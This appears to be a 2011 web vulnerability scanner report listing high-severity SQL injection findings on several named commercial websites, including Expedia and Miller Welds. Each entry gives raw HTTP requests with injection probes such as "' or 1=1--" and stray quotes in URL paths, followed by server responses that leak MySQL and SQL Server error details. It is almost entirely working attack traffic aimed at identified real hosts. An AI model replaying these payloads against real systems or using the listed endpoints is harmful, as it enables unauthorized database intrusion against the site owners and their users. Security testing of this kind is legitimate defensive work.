HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:58 GMT X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:58 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/For_Businesses16640137'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:58 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:58 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/businesses/id/13 |
GET /main/do/businesses48717636'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:38:52 GMT X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:38:52 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32718 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/businesses48717636'%20or%201%3d2-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://www.dominione User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:38:52 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:38:52 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /daily/common/moreinfo |
POST /daily/common/moreinfo Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 Origin: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 Content-Length: 1023 BundleType=1&WT=Home ...[SNIP]... rigName=&LsFlightDestTLA= |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 23:21:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX011 Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 77907 <!-- srvpush1 16:21:24(:715) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... <COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepa ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=flex Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:39:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX01C Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 76383 <!-- srvpush1 15:39:25(:293) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... <COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type numeric to tinyint."> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /pub/agent.dll |
GET /pub/agent.dll?qscr=flex Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:39:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX01C Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 77852 <!-- srvpush1 15:39:01(:987) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... <COMMENT ID=ERROR_TEXT TITLE="[MR32]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type int to tinyint."> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.expedia.com |
Path: | /pubspec/scripts/eap.asp |
GET /pubspec/scripts/eap.asp Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Fri, 06 May 2011 22:38:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: s1=`user=v.8,0,EX01E Set-Cookie: p1=`tpid=v.1,1`accttype=v Content-Length: 77907 <!-- srvpush1 15:38:49(:042) --> <style type="text/css"> .intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;} .intchk ul{list-style-type: none; padding: 0; margin-left: 1em;} . ...[SNIP]... <COMMENT ID=ERROR_TEXT TITLE="[MR09]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /FCWSite/Img/ntpagetag |
GET /FCWSite/Img/ntpagetag Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 404 Not Found Date: Sat, 07 May 2011 01:31:45 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=0; path=/ Set-Cookie: PortletId=0; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: ZoneId=0; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 888 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head><title> 404 </title></head> <body MS_POSITIONING= <form name="Form1" method="post" acti ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /FCWSite/Img/ntpagetag |
GET /FCWSite/Img/ntpagetag Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:51:21 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=0; path=/ Set-Cookie: PortletId=0; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: ZoneId=0; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 890 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head><title> 404 </title></head> <body MS_POSITIONING= <form name="Form1" method="post" acti ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /FCWSite/Img/ntpagetag |
GET /FCWSite/Img/ntpagetag Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 404 Not Found Date: Sat, 07 May 2011 00:53:50 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=0; path=/ Set-Cookie: PortletId=0; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: ZoneId=0; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 921 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head><title> 404 </title></head> <body MS_POSITIONING= <form name="Form1" method="post" acti ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /aboutus/uniGC.aspx |
GET /aboutus/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:33:21 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1844; path=/ Set-Cookie: PortletId=5981402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48748 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Language=7483b893-e478 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:30:31 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Set-Cookie: sessionKey=3dc8e81d-f541 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172253 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Language=7483b893-e478 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:27:28 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Set-Cookie: sessionKey=6d620d41-9034 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172253 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:53:44 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 66359 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:36 GMT Connection: Keep-Alive Content-Length: 27688 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing'/images/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 27717 Date: Fri, 06 May 2011 19:12:53 GMT X-Varnish: 1128246861 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
GET /financing''/images/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 29453 Date: Fri, 06 May 2011 19:12:54 GMT X-Varnish: 1128247139 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing/images'/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 27716 Date: Fri, 06 May 2011 19:12:59 GMT X-Varnish: 1128247898 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
GET /financing/images''/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 29451 Date: Fri, 06 May 2011 19:13:00 GMT X-Varnish: 1128248119 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing/images Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:13:05 GMT Connection: Keep-Alive Content-Length: 27752 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images ...[SNIP]... |
GET /financing/images Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:13:06 GMT Connection: Keep-Alive Content-Length: 29451 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing/images Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
